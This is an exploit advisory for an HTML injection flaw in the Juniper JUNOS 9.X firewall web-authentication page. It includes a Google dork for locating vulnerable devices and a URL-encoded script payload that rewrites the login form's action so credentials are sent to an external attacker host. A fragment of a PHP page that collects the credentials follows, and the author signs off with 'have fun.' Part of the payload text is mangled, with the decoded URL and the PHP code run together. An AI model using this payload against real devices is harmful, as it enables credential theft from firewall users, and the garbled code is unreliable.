Exploit Title: Juniper JUNOS 9.X HTML Injection Vulnerability Google Dork: intext:"2009, Juniper Networks" intext:"Firewall User Web-Authentication" Date: Jul 24th 2013 Exploit Author: Andrea Menin (linkedin.com/in/andreamenin) Vendor Homepage: http://www.juniper.net Version: JUNOS 9.X Tested on: Firefox 22.0 Description: ------------ The Juniper Firewall has a PHP authentication and authorization page for using ports and services that usually are not enabled. The page contains a html form that sends authentication requests to the following url: "https://?target=&auth_id=&ap_name=" Looking at this URL we can see that, along with your username and password, will be sent the variables $target, $auth_id and $ap_name. The contents of these variables is placed in the destination URL of the html form ("action" argument), so injecting HTML code into these variables can change the form, and you can change the "action" parameters for collect username and password on external page. Exploit: -------- The exploit consists on injecting DOM functions for replace the "action" parameters into the tag
with an external URL that will collects username and password used by the users. You can use the DOM function "setAttribute" for replace the "action" parameters, like this script: Exploit URL: https:///?target=&auth_id=&ap_name=%22%3E%3Cscript%3Edocument.getElementsByTagName%28%27form%27%29[0].setAttribute%28%27action%27,%20%27http://i.am.a.bad.boy.xy/fuck.php%27%29%3C/script%3E%3Ca%20href=%22 url-decoded, appears like this: https:///?target=&auth_id=&ap_name=">\n" ); // taking user to home header("Location: https://10.0.0.1"); ?> have fun. -- Andrea (aka und3r) Menin menin.andrea [at] gmail.com linkedin.com/in/andreamenin